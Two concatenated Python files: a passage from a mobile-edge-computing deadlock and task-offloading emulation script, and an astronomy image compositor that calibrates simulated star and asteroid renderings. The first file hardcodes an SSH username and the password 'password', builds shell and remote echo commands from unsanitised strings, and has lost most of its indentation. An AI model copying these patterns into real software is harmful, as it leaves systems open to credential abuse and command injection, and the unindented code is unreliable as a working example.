print('safe seq: ', safe_seq)
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
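# Hedged sketch (assumed toy data: 3 resource types, 2 processes, independent
# of the global _need/allocation tables): the core safety test that is_safe()
# performs before it falls back to offloading.
def _bankers_safety_sketch():
    avail = [3, 3, 2]
    need = [[1, 2, 2], [0, 1, 1]]
    allot = [[0, 1, 0], [2, 0, 0]]
    work, finish, safe_seq = list(avail), [False, False], []
    while len(safe_seq) < len(need):
        progressed = False
        for p in range(len(need)):
            if not finish[p] and all(need[p][j] <= work[j] for j in range(3)):
                # the process can finish, so its allocation is released
                work = [work[j] + allot[p][j] for j in range(3)]
                finish[p] = True
                safe_seq.append(p)
                progressed = True
        if not progressed:
            return None  # unsafe state: no remaining process can proceed
    return safe_seq  # [0, 1] for the values above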
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
    # waiting time estimate = total waiting time / 2 (the average waiting time; this might be too tight)
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # multi-casting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
        t_time[i.split('_')[0]][1] -= diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
print('Execution time comparison:= ', checking_times)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
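# Hedged sketch (illustrative only): the cumulative moving average formula used
# above, written as a pure function over a plain list of samples.
def _cumulative_moving_average_sketch(samples):
    # mu_n = ((n - 1) * mu_(n-1) + x_n) / n
    avg = 0.0
    for n, x in enumerate(samples, start=1):
        avg = ((n - 1) * avg + x) / n
    return round(avg, 4)
# e.g. _cumulative_moving_average_sketch([0.2, 0.4, 0.6]) == 0.4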
def algo_id():
no = int(os.path.basename(__file__)[0])
if no <= 2:
return 2
elif no <= 4:
return 3
elif no <= 7:
return 7
elif no <= 10:
return 10
elif no <= 13:
return 12
else:
return 16
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str(['speaker', ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
elif mg == 'update':
ho = hosts.copy()
ho['speaker'] = host_ip
smg = mg + ' ' + str(ho)
sock1.sendto(str.encode(smg), _multicast_group)
send_message('client')
# print('\n===**====**==update message sent===**======**=========')
elif mg == 'client':
ho = hosts.copy()
ho[get_hostname()] = host_ip
smg = f'm {ho}_{algo_id()}'
_client.publish(topic, smg, retain=True)
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message():
global hosts
while True:
if stop == 1:
print('Stopped : receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
# print('received: ', hosts)
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
                        address[0]))  # calculate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
elif data.decode().strip() == 'user':
send_message('update')
def mec_comparison():
    # returns the host with the smallest last-reported waiting time, or 0 if no MEC wait times are known
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0,0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time()+['local']}), )
# count_task_sent(j)
# _loc += 1
# else:
# print('else execute: ', j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(): # run as a thread
global _inward_mec
global t_track
while True:
if stop == 1:
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time()+['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*'*30 + f'\n{da[1]} Not in Task Record\n' + '*'*30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload():
global reoffload_list, outward_mec
global offload_check
while True:
if stop == 1:
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
                offload_check[1] += len(o[0])
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+bankers {}'.format(get_hostname())
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
s_port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, s_port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def run_me():
global discovering
initialization()
while True:
if len(hosts) == mec_no:
print('MEC Details: ', hosts)
del hosts['speaker']
discovering = 1
break
time.sleep(2)
speak = Thread(target=speaking_node)
thread_record.append(speak)
speak.daemon = True
speak.start()
start_loop()
def save_and_email():
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_2_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_2_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}" \
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} \noff_cloud{_id_}_2_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_2_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}",
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}",
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_2_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_2_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_2_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:/home/mec/result/python"])
sp.run(
["scp", f"{path_}{_id_}_2_{mec_no}datal.py", f"mec@{hosts['osboxes-0']}:/home/mec/result/linux"])
send_result(hosts['osboxes-0'], list_result)
send_email(result)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time()+[task_record[_task_]]}), )
def start_loop():
global _loc
global tasks
global t_time
global node_id
global stop
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
_threads_ = [receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
for i in _threads_:
        th = Thread(target=i, daemon=True)
        th.start()
time.sleep(2)
send_message('client') # send mec details to clients
# print('algo_id: ', algo_id())
x = gp.getpass('Press any key to Start...').lower()
if x != 'exit':
print('========= Waiting for tasks ==========')
_time_ = dt.datetime.now()
while True:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('RMS List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
if len(compare_result[0]) > 0:
print('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
now = dt.datetime.now()
delta = now - _time_
if delta > dt.timedelta(minutes=4):
                        print('terminating programme: 4 minutes elapsed')
save_and_email()
stop += 1
'''
for i in thread_record:
i.join()
'''
_client.loop_stop()
time.sleep(1)
print('done')
os.system('kill -9 {}'.format(os.getpid()))
break
except KeyboardInterrupt:
print('\nProgramme Terminated')
save_and_email()
stop += 1
'''
for i in thread_record:
i.join()
'''
_client.loop_stop()
time.sleep(1)
print('done')
os.system('kill -9 {}'.format(os.getpid()))
break
def speaking_node():
global mec_no
while True:
if len(hosts) > (mec_no - 1):
send_message('update')
mec_no = len(hosts) + 1
time.sleep(2)
def initialization():
global mec_no
global host_ip
global cloud_ip
host_ip = ip_address()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
print('Broker IP: ', s.getsockname()[0])
try:
mec_no = int(input('Number of MECs: ').strip())
cloud_ip = input('Cloud Server IP: ').strip()
print('\nCompiling MEC Details')
h1 = Thread(target=receive_message)
h2 = Thread(target=receive_offloaded_task_mec)
h1.daemon = True
h2.daemon = True
h1.start()
h2.start()
time.sleep(1.5)
while True:
b = input('Send Hello Message (Y/N): ').strip().lower()
if b == 'y':
send_message('hello')
break
else:
print('\nPlease Type "y" to send Hello message\n')
except KeyboardInterrupt:
print('\nProgramme Terminated')
exit(0)
def main():
global algo
os.system('clear')
print('mec ip: ', ip_address())
algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
run_me()
if __name__ == "__main__":
main()
|
compositor.py
|
"""
The compositor module combines the different output files of the simulation.
As the simulation module outputs different files for background and foreground,
and because the intensity of the Blender-rendered images is not constant, the
compositor is required to fix the intensity issue and to add the star background.
"""
from datetime import datetime
import json
from pathlib import Path
import threading
from astropy import constants as const
from astropy import units as u
import cv2
import numpy as np
from . import utils
#Astrometric calibrations
#https://www.cfa.harvard.edu/~dfabricant/huchra/ay145/mags.html
FLUX0_VBAND = 3640 * 1.51E7 * 0.16 * u.ph / (u.s * u.m ** 2) # Photons per m^2
SUN_MAG_VBAND = -26.74 * u.mag # 1 AU distance
SUN_FLUX_VBAND_1AU = np.power(10., -0.4 * SUN_MAG_VBAND.value) * FLUX0_VBAND
class ImageCompositorError(RuntimeError):
"""This is a generic error for the compositor."""
pass
class Frame():
"""Class to wrap all data of a single frame."""
metadata = None
stars = None
sssb_only = None
sssb_const_dist = None
light_ref = None
def __init__(self,
frame_id,
image_dir=None,
stars=None,
sssb_only=None,
sssb_const_dist=None,
light_ref=None):
self.id = frame_id
if None not in (stars, sssb_only, sssb_const_dist, light_ref):
self.stars = stars
self.sssb_only = sssb_only
self.sssb_const_dist = sssb_const_dist
self.light_ref = light_ref
elif image_dir is not None:
self.read_complete_frame(self.id, image_dir)
else:
raise ImageCompositorError("Unable to create frame.")
def calc_ref_intensity(self):
"""Calculates reference intensitiy using the light reference scene."""
(height, width, _) = self.light_ref.shape
h_slice = (height // 2 - 35, height // 2 + 35)
w_slice = (width // 2 - 35, width // 2 + 35)
area = self.light_ref[h_slice[0]:h_slice[1], w_slice[0]:w_slice[1], 0]
intensities = np.mean(area)
return intensities
def calc_stars_stats(self):
"""Calculate star scene parameters."""
star_c_max = []
star_c_sum = []
for i in range(3):
star_c_max.append(np.max(self.stars[:, :, i]))
star_c_sum.append(np.sum(self.stars[:, :, i]))
return (star_c_max, star_c_sum)
def calc_sssb_stats(self, const_dist=False):
"""Calculate SSSB max and sum corrected with alpha channel.
If const_dist is True, stats of const distant images are calculated.
"""
if const_dist:
sssb_max = np.max(
self.sssb_const_dist[:, :, 0] * self.sssb_const_dist[:, :, 3])
sssb_sum = np.sum(
self.sssb_const_dist[:, :, 0] * self.sssb_const_dist[:, :, 3])
else:
sssb_max = np.max(
self.sssb_only[:, :, 0] * self.sssb_only[:, :, 3])
sssb_sum = np.sum(
self.sssb_only[:, :, 0] * self.sssb_only[:, :, 3])
return (sssb_max, sssb_sum)
def read_complete_frame(self, frame_id, image_dir):
"""Reads all images for a given frame id.
This includes Stars, SssbOnly, SssbConstDist, and LightRef.
"""
frame_fmt_str = image_dir / ("{}_" + frame_id + ".exr")
frame_fmt_str = str(frame_fmt_str)
self.metadata = self.read_meta_file(frame_id, image_dir)
filename = frame_fmt_str.format("Stars")
self.stars = utils.read_openexr_image(filename)
filename = frame_fmt_str.format("SssbOnly")
self.sssb_only = utils.read_openexr_image(filename)
filename = frame_fmt_str.format("SssbConstDist")
self.sssb_const_dist = utils.read_openexr_image(filename)
filename = frame_fmt_str.format("LightRef")
self.light_ref = utils.read_openexr_image(filename)
def read_meta_file(self, frame_id, image_dir):
"""Reads metafile of a frame."""
filename = image_dir / ("Metadata_" + frame_id + ".json")
with open(str(filename), "r") as metafile:
metadata = json.load(metafile)
date = datetime.strptime(metadata["date"], "%Y-%m-%dT%H%M%S-%f")
metadata["date"] = date
metadata["distance"] = metadata["distance"] * u.m
metadata["sc_pos"] = np.asarray(metadata["sc_pos"]) * u.m
metadata["sssb_pos"] = np.asarray(metadata["sssb_pos"]) * u.m
return metadata
class ImageCompositor():
"""This class provides functions to combine the final simulation images."""
IMG_MIN_SIZE_INFOBOX = (1200, 1000)
INFOBOX_SIZE = {"default": (400, 100), "min": (200, 50)}
def __init__(self,
res_dir,
img_dir,
instrument,
sssb,
with_infobox,
with_clipping,
ext_logger):
self.logger = ext_logger
self.res_dir = res_dir
self.image_dir = img_dir
self.image_extension = ".exr"
self._threads = []
self.inst = instrument
self.dlmult = 2
self.sssb = sssb
self.with_infobox = with_infobox
self.with_clipping = with_clipping
self.logger.debug(f"Infobox: {with_infobox}. Clip: {with_clipping}.")
def get_frame_ids(self):
"""Extract list of frame ids from file names of SssbOnly scenes."""
scene_name = "SssbOnly"
image_names = scene_name + "*" + self.image_extension
filenames = self.image_dir.glob(image_names)
ids = []
        for filename in filenames:
            # str.strip() removes characters, not substrings, so slice off the
            # known scene-name prefix and extension suffix to get the frame id.
            name = str(filename.name)
            name = name[len(scene_name):-len(self.image_extension)]
            ids.append(name.strip("_"))
return ids
def calc_relative_intensity_curve(self):
"""Calculates the relative intensity curve for all sssb frames."""
only_stats = np.zeros(len(self.frames))
const_dist_stats = np.zeros(len(self.frames))
distances = np.zeros(len(self.frames))
for i, frame in enumerate(self.frames):
only_stats[i] = frame.calc_sssb_stats()[1]
const_dist_stats[i] = frame.calc_sssb_stats(True)[1]
distances[i] = frame.metadata["distance"]
rel_intensity = only_stats / const_dist_stats
ind_sorted = distances.argsort()
distances = distances[ind_sorted]
rel_intensity = rel_intensity[ind_sorted]
for last in range(len(distances)):
if rel_intensity[last] == 0:
break
#last -= 1
rel_intensity = rel_intensity[:last]
return rel_intensity
def compose(self, frames=None, max_threads=3):
"""
Composes different images into final image, uses multi-threading.
!!! CAUTION !!! Call only once at a time.
        :type frames: str, Frame or list of Frame
        :param frames: Frame id, Frame or list of frames used for calibration
                       and composition; if None, all frames found in the image
                       directory are composed.
        :type max_threads: int
        :param max_threads: Upper bound used to limit the number of concurrent
                            composition threads.
        """
if frames is None:
self.frame_ids = self.get_frame_ids()
frames = []
for frame_id in self.frame_ids:
new_frame = Frame(frame_id, self.image_dir)
frames.append(new_frame)
elif isinstance(frames, str):
frames = [Frame(frames, self.image_dir)]
elif isinstance(frames, Frame):
frames = [frames]
elif isinstance(frames, list) and isinstance(frames[0], Frame):
pass
else:
raise ImageCompositorError(
"Compositor.compose requires frame or list of frames as input")
for frame in frames:
for thr in self._threads:
if not thr.is_alive():
self._threads.pop(self._threads.index(thr))
if len(self._threads) < max_threads - 1:
# Allow up to 2 additional threads
thr = threading.Thread(target=self._compose, args=(frame,))
thr.start()
self._threads.append(thr)
else:
# If too many, also compose in main thread to not drop a frame
self._compose(frame)
for thr in self._threads:
thr.join()
def _compose(self, frame):
"""
Composes raw images and adjusts light intensities.
:type frame: Frame
        :param frame: Frame containing the necessary information for composition.
"""
# Calculate Gaussian standard deviation for approx diffraction pattern
sigma = (self.dlmult * 0.45 * self.inst.wavelength
* self.inst.focal_l / (self.inst.aperture_d
* self.inst.pix_l))
# SSSB photometry
sc_sun_dist = np.linalg.norm(frame.metadata["sc_pos"]) * u.m
ref_flux = SUN_FLUX_VBAND_1AU * ((const.au / sc_sun_dist) ** 2)
ref_flux *= self.inst.aperture_a * self.inst.pix_a
ref_flux /= ((self.inst.focal_l ** 2) * np.pi)
ref_flux = ref_flux.decompose()
# Star photometry
starmap_flux = FLUX0_VBAND * frame.metadata["total_flux"]
starmap_flux *= self.inst.aperture_a
starmap_flux = starmap_flux.decompose()
# Calibrate starmap
(_, stars_sums) = frame.calc_stars_stats()
frame.stars[:, :, 0:3] *= starmap_flux.value / stars_sums[0]
# Create composition image array
composed_img = np.zeros(frame.stars.shape, dtype=np.float32)
# Calibrate SSSB, depending on visible size
dist_scale = np.power(1E6 * u.m / frame.metadata["distance"], 2.)
vis_dim = self.sssb["max_dim"] * dist_scale
# Kernel size calculated to equal skimage.filters.gaussian
# Reference:
# https://github.com/scipy/scipy/blob/4bfc152f6ee1ca48c73c06e27f7ef021d729f496/scipy/ndimage/filters.py#L214
kernel = int((4 * sigma + 0.5) * 2)
kernel = max(kernel, 5) # Don't use smaller than 5
ksize = (kernel, kernel)
if vis_dim < 0.1:
# Use point source sssb
# Generate point source reference image
sssb_ref = self.create_sssb_ref(self.inst.res)
alpha = frame.sssb_const_dist[:, :, 3]
scale = frame.sssb_const_dist[:, :, 0:3] * alpha
sssb_ref[:, :, 0:3] *= np.sum(scale, axis=-1) * dist_scale
            composed_img = (sssb_ref[:, :, 0:3] + frame.stars)
composed_img *= self.inst.quantum_eff
composed_img = cv2.GaussianBlur(composed_img, ksize, sigma)
composed_img += np.random.poisson(composed_img)
composed_max = np.max(composed_img)
ref_sssb_max = np.max(sssb_ref[:, :, 0:3])
if composed_max > ref_sssb_max * 5:
composed_max = ref_sssb_max * 5
else:
# Calibrate sssb images
ref_int = frame.calc_ref_intensity()
sssb_cal_factor = ref_flux * self.sssb["albedo"] / ref_int
sssb_cal_factor = sssb_cal_factor.decompose().value
frame.sssb_only[:, :, 0:3] *= sssb_cal_factor
frame.sssb_const_dist[:, :, 0:3] *= sssb_cal_factor
# Merge images taking alpha channel and q.e. into account
alpha = frame.sssb_only[:, :, 3]
for c in range(3):
sssb = frame.sssb_only[:, :, c]
stars = frame.stars[:, :, c]
composed_img[:, :, c] = alpha * sssb + (1 - alpha) * stars
composed_img[:, :, 0:3] *= self.inst.quantum_eff
composed_img = cv2.GaussianBlur(composed_img, ksize, sigma)
composed_img += np.random.poisson(composed_img)
composed_max = np.max(composed_img)
composed_img[:, :, :] /= composed_max
if self.with_infobox:
infobox_img = composed_img[:, :, 0:3] * 255
infobox_img = infobox_img.astype(np.uint8)
try:
self.add_infobox(infobox_img, frame.metadata)
except ImageCompositorError as e:
self.logger.debug(f"No Infobox could be added. {str(e)}!")
filename = self.res_dir / ("Comp_" + str(frame.id) + ".png")
cv2.imwrite(str(filename), infobox_img)
exrfile = self.image_dir / ("Comp_" + str(frame.id))
else:
exrfile = self.res_dir / ("Comp_" + str(frame.id))
if self.with_clipping:
clipped_img = self.clip_color_depth(composed_img)
filename = self.res_dir / ("Inst_" + str(frame.id) + ".png")
cv2.imwrite(str(filename), clipped_img)
rel_pos = frame.metadata["sc_pos"] - frame.metadata["sssb_pos"]
rel_pos = rel_pos.value / 1000.
filename = str(filename) + ".xyz"
with open(str(filename), "w") as priorfile:
priorfile.write(f"{rel_pos[0]} {rel_pos[1]} {rel_pos[2]}")
exrfile = self.image_dir / ("Comp_" + str(frame.id))
else:
exrfile = self.res_dir / ("Comp_" + str(frame.id))
utils.write_openexr_image(exrfile, composed_img)
def create_sssb_ref(self, res, scale=5):
"""Creates a reference sssb image for calibration.
        Gives a sort of natural look by rendering the point source at a
        resolution increased by a factor of scale, applying a Gaussian blur and
        decimating the result to match the size of the other images.
        The OpenCV resize algorithm needs an integer-divisible number of pixels
        to behave the same as skimage.transform.downscale_local_mean; without
        the scaling, zero-padding as done by
        skimage.transform.downscale_local_mean would be necessary.
        """
res_x, res_y = res
# Rescale
res_x_sc = res_x * scale
res_y_sc = res_y * scale
sssb_point = np.zeros((res_x_sc, res_y_sc, 4), np.float32)
sig = scale / 2.
kernel = int((4 * sig + 0.5) * 2)
ksize = (kernel, kernel)
# Create point source and blur
sssb_point[res_x_sc//2, res_y_sc//2, :] = [1., 1., 1., 1.]
sssb_point = cv2.GaussianBlur(sssb_point, ksize, sig)
sssb = np.zeros((res_x, res_y, 4), np.float32)
sssb = cv2.resize(sssb_point, None, fx=1/scale, fy=1/scale,
interpolation=cv2.INTER_AREA)
sssb *= (scale * scale)
sssb[:, :, 0:3] /= np.sum(sssb[:, :, 0:3])
return sssb
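    # Worked example of the parameters above (hedged, assuming the default
    # scale=5): sig = 2.5 and kernel = int((4 * 2.5 + 0.5) * 2) = 21, so a
    # 21x21 Gaussian is applied to the upscaled point source before the
    # INTER_AREA resize decimates it back down by a factor of 5.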
def add_infobox(self, img, metadata, height=None, width=None):
"""Overlays an infobox to a given image in the lower right corner."""
# ~ Smallest size 1000 1200 for which 100 400 works
y_res, x_res, _ = img.shape
if height is None:
if y_res > self.IMG_MIN_SIZE_INFOBOX[1]:
height = self.INFOBOX_SIZE["default"][1]
else:
scale = y_res / self.IMG_MIN_SIZE_INFOBOX[1]
height = scale * self.INFOBOX_SIZE["default"][1]
height = int(np.ceil(height))
if width is None:
if x_res > self.IMG_MIN_SIZE_INFOBOX[0]:
width = self.INFOBOX_SIZE["default"][0]
else:
scale = x_res / self.IMG_MIN_SIZE_INFOBOX[0]
